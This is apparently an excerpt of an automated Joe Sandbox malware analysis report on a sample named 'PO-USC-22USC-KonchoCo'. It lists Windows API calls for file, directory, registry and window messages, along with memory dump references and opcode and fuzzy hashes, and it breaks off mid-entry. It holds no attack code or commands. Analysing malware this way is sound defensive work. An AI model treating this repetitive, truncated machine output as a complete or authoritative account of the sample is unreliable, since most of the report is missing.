                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                        • String ID:
                                                        • API String ID: 2547128583-0
                                                        • Opcode ID: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
                                                        • Instruction ID: b294046d3e4dddd9dd595f306a5883e4a37f4b9faaa0bea25d2c73fe5553ab8f
                                                        • Opcode Fuzzy Hash: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
                                                        • Instruction Fuzzy Hash: DFE08636704610AAD610BA709E48C6773A89F86710302C83FF546F6140D738DC32AA79
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(00000003,00403118,00437800,80000000,00000003), ref: 00406176
                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406198
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesCreate
                                                        • String ID:
                                                        • API String ID: 415043291-0
                                                        • Opcode ID: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                        • Instruction ID: be52236ca1bfc2e7009fe271a1dfd41440a2a0d1ebc26b2cb4c8630358080456
                                                        • Opcode Fuzzy Hash: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                        • Instruction Fuzzy Hash: 30D09E31254301EFFF098F20DE16F2EBAA2EB94B00F11952CB682941E0DA715819DB15
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(?,?,00405D52,?,?,00000000,00405F28,?,?,?,?), ref: 00406152
                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406166
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                        • Instruction ID: c2cf34f9040e51e437c363cb0e130cc408ba31f940be0e29863539f2f5e5855d
                                                        • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                        • Instruction Fuzzy Hash: 34D0C976504220AFC2102728AE0889BBB55DB552717028A35F8A9A22B0CB314C6A8694
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00403638,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405C36
                                                        • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405C44
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectoryErrorLast
                                                        • String ID:
                                                        • API String ID: 1375471231-0
                                                        • Opcode ID: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                        • Instruction ID: 9ee767d7bb24d12ef4013e29ffdbd8bf560f6e5ed3fd997729cc5c4a92c9c995
                                                        • Opcode Fuzzy Hash: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                        • Instruction Fuzzy Hash: 4EC08C30208601DAEA040B30DE08F073A50BB00340F214439A082E40A4CA308004CD2D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023EE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfileStringWrite
                                                        • String ID:
                                                        • API String ID: 390214022-0
                                                        • Opcode ID: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                        • Instruction ID: 95154b02373db31601182c66ccc42c3a1d246cd64da090b0d32e859a1de181fa
                                                        • Opcode Fuzzy Hash: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                        • Instruction Fuzzy Hash: 7DE04F31900524BADB5036B15ECDDBE20685FC8318B14063FFA12B61C2D9FC0C43466D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • WriteFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,004132DF,0040CEF0,0040357E,0040CEF0,004132DF,00414EF0,00004000,?,00000000,004033A8,00000004), ref: 00406238
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: FileWrite
                                                        • String ID:
                                                        • API String ID: 3934441357-0
                                                        • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                        • Instruction ID: 6296e445ee025582091cb162a3efd7a4c9b40fecddc6e186669f82422f4bfe72
                                                        • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                        • Instruction Fuzzy Hash: 00E08C3221021AABDF10AE548C00EEB3B6CEB013A0F02447AFD16E3050D231E83097A9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035FA,00008001,00008001,004034FE,00414EF0,00004000,?,00000000,004033A8), ref: 00406209
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                        • Instruction ID: f029eba0d3a9f8ebddca737992f63761e7b4746d0aa70cfc26448402395c61e3
                                                        • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                        • Instruction Fuzzy Hash: 5DE08632154119EBCF106E908C00EEB379CEF15350F014876F921E7440D230E8328FA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040242A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfileString
                                                        • String ID:
                                                        • API String ID: 1096422788-0
                                                        • Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                        • Instruction ID: 816608b18dc0c520cd9a71caba4f9b5dbdb35d60be0fcf423de44464aa3a4457
                                                        • Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                        • Instruction Fuzzy Hash: 95E04F31800229BEDB00EFA0CD09DAD3678AF40304F00093EF510BB0D1E7FC49519749
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,0040657D,?,?,?,?,: Completed,?,00000000), ref: 00406513
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: Open
                                                        • String ID:
                                                        • API String ID: 71445658-0
                                                        • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                        • Instruction ID: 600eba3f25fec8fd2e0e76c9bf818d2d921b30b98e1649e5cb913c6f6c6f8cb9
                                                        • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                        • Instruction Fuzzy Hash: 4DD0123600020DBBDF115E90ED01FAB3B5DAB08714F014826FE06A4091D775D530AB59
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040465F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: bbff93e8e7b6fbbde5b3e6835961aabe87c2407351212feb15be82645ba7347e
                                                        • Instruction ID: 8da91bbb186c2144be8ade9eda525c6e960391099661206c99069da2b113483a
                                                        • Opcode Fuzzy Hash: bbff93e8e7b6fbbde5b3e6835961aabe87c2407351212feb15be82645ba7347e
                                                        • Instruction Fuzzy Hash: 8AC04C717402007BDA209B609E49F0777545790740F1448397241E50E0DA75E450DA1C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SendMessageW.USER32(00000028,?,00000001,00404461), ref: 00404644
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 7b4bfb7d8a9e2d5081e5309f0fc6290f036d11fbecd93854b33ee848cd02fe6a
                                                        • Instruction ID: d5eb2a856a333d3101ae379727e71f2b9456d74e3cdd14bb02a2274a242f0d94
                                                        • Opcode Fuzzy Hash: 7b4bfb7d8a9e2d5081e5309f0fc6290f036d11fbecd93854b33ee848cd02fe6a
                                                        • Instruction Fuzzy Hash: 7DB09235280640AADE215B00DE09F867B66A7A4701F008438B240640B0CAB204A1DB08
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FB,?), ref: 0040360B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                        • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                        • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                        • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • KiUserCallbackDispatcher.NTDLL(?,004043FA), ref: 0040462D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: CallbackDispatcherUser
                                                        • String ID:
                                                        • API String ID: 2492992576-0
                                                        • Opcode ID: a1d13c5b68b43feb2506ad2660f88dc7f5461ef8ac70b9f67d62976f64309ddb
                                                        • Instruction ID: 1e4f5f38d13ad7c97f33cdc532a4b6885827051f8054e7174c13f2a159251e9b
